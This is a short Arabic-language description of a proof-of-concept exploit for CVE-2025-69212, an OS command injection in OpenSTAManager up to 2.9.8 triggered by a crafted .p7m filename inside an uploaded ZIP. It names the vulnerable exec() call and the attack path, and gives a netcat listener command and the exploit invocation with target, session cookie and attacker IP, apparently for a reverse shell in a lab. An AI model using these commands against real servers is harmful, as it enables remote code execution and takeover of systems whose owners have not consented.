
برهان مفهوم لاستغلال ثغرة CVE-2025-69212: حقن أوامر في نظام التشغيل في OpenSTAManager <= 2.9.8 عبر اسم ملف .p7m خبيث في تحميل ZIP، مما يتيح تنفيذ تعليمات برمجية عن بُعد.
OpenSTAManager <= 2.9.8 — حقن أوامر النظام عبر اسم ملف .p7m خبيث في تحميل ZIP.
الملف: src/Util/XML.php:100 — $file غير منقى في exec()
الناقل: /plugins/importFE_ZIP/actions.php → ZIP → اسم ملف .p7m → exec("openssl smime ... -in \"$file\" ...")
# Listener
nc -lvnp 4444
# Exploit
python3 CVE-2025-69212.py http://target.htb YOUR_PHPSESSID 10.10.14.X 4444